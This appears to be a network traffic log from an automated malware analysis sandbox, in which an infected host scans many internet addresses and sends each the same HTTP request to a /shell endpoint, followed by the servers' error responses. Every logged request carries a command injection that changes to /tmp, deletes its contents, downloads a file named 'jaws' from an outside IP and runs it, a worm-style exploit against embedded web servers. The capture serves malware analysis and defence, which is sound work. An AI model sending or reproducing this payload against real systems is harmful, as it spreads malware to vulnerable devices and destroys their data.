                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:34.283060074 CET320INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.21.0
                                                            Date: Fri, 26 Jan 2024 14:32:34 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 153
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.21.0</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            507192.168.2.233368614.245.88.10580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:34.039201021 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            508192.168.2.23342262.37.191.14380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:34.344228983 CET622INData Raw: 55 4e 4b 4e 4f 57 4e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 36 20 4a 61 6e 20 32 30 32 34 20 31 34 3a 33 32 3a 33 34 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74
                                                            Data Ascii: UNKNOWN 400 Bad RequestServer: Date: Fri, 26 Jan 2024 14:32:34 GMTCache-Control: no-cache,no-store,max-age=0Prama: no-cacheX-Frame-Options: DENYExpires: 0X-Content-Type-Options: nosniffX-XSS-Protection: 0; mode=blockContent-S


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            509192.168.2.234185250.19.0.15380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:35.511583090 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:35.628276110 CET490INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:32:34 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            510192.168.2.235316845.221.114.7980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:35.546806097 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:35.700809002 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:35 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            511192.168.2.2346190154.81.106.11080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:35.690212011 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            512192.168.2.234006013.55.166.21380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:35.983520031 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            513192.168.2.234978627.74.199.24180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:36.350234032 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:36.720774889 CET1286INHTTP/1.1 400 Bad Request
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            X-Frame-Options: SAMEORIGIN
                                                            Content-Security-Policy: frame-ancestors 'self';
                                                            Cache-Control: no-cache,no-store
                                                            Pragma: no-cache
                                                            Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50
                                                            Data Ascii: <html> <head><title>400 Bad Request</title></head> <body bgcolor="#FFFFFF" text="#000000" link="#2020ff" vlink="#4040cc"> <h2>400 Bad Request</h2>Your request has bad syntax or is inherently impossible to satisfy.<div style="display:none"><ajax_response_xml_root><IF_ERRORSTR>SessionTimeout</IF_ERRORSTR><IF_ERRORPARAM>SUCC</IF_ERRORPARAM><IF_ERRORTYPE>SUCC</IF_ERRORTYPE></ajax_response_xml_root><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>P
                                                            Jan 26, 2024 15:32:36.720788956 CET217INData Raw: 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e
                                                            Data Ascii: adding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span></div><hr /></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            514192.168.2.2344384159.192.157.680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:36.360353947 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:36.737669945 CET1286INHTTP/1.1 400 Bad Request
                                                            Server: ZTE web server 1.0 ZTE corp 2015.
                                                            Accept-Ranges: bytes
                                                            Connection: close
                                                            X-Frame-Options: SAMEORIGIN
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data:
                                                            Cache-Control: no-cache,no-store
                                                            Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69
                                                            Data Ascii: <html> <head><title>400 Bad Request</title></head> <body bgcolor="#FFFFFF" text="#000000" link="#2020ff" vlink="#4040cc"> <h2>400 Bad Request</h2>Your request has bad syntax or is inherently impossible to satisfy.<div style="display:none"><ajax_response_xml_root><IF_ERRORSTR>SessionTimeout</IF_ERRORSTR><IF_ERRORPARAM>SUCC</IF_ERRORPARAM><IF_ERRORTYPE>SUCC</IF_ERRORTYPE></ajax_response_xml_root><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show thi
                                                            Jan 26, 2024 15:32:36.737771988 CET270INData Raw: 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f
                                                            Data Ascii: s error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span></div><hr /><


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            515192.168.2.2351858223.6.157.980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:36.362831116 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:36.741802931 CET161INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html
                                                            Date: Fri, 26 Jan 2024 14:32:36 GMT
                                                            Connection: close
                                                            Content-Length: 20
                                                            Data Raw: 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e
                                                            Data Ascii: <h1>Bad Request</h1>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            516192.168.2.234395034.160.251.13180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:36.823697090 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:36.927035093 CET441INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html; charset=UTF-8
                                                            Referrer-Policy: no-referrer
                                                            Content-Length: 273
                                                            Date: Fri, 26 Jan 2024 14:32:36 GMT
                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 74 65 78 74 3d 23 30 30 30 30 30 30 20 62 67 63 6f 6c 6f 72 3d 23 66 66 66 66 66 66 3e 0a 3c 68 31 3e 45 72 72 6f 72 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 68 32 3e 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 3c 2f 68 32 3e 0a 3c 68 32 3e 3c 2f 68 32 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>400 Bad Request</title></head><body text=#000000 bgcolor=#ffffff><h1>Error: Bad Request</h1><h2>Your client has issued a malformed or illegal request.</h2><h2></h2></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            517192.168.2.235949413.32.123.22980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:36.929486990 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:37.139273882 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:32:37 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            518192.168.2.234713483.4.148.19880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:36.974292040 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:37.228183985 CET339INHTTP/1.0 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 07:32:57 GMT
                                                            Server: Boa/0.94.14rc21
                                                            Accept-Ranges: bytes
                                                            Connection: close
                                                            Content-Type: text/html; charset=ISO-8859-1
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            519192.168.2.2345092223.252.6.2180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:37.032412052 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:37.344943047 CET499INHTTP/1.1 404 Not Found
                                                            Date: Fri, 26 Jan 2024 14:32:37 GMT
                                                            Server: Apache
                                                            Vary: Accept-Encoding
                                                            Content-Length: 262
                                                            Keep-Alive: timeout=15, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
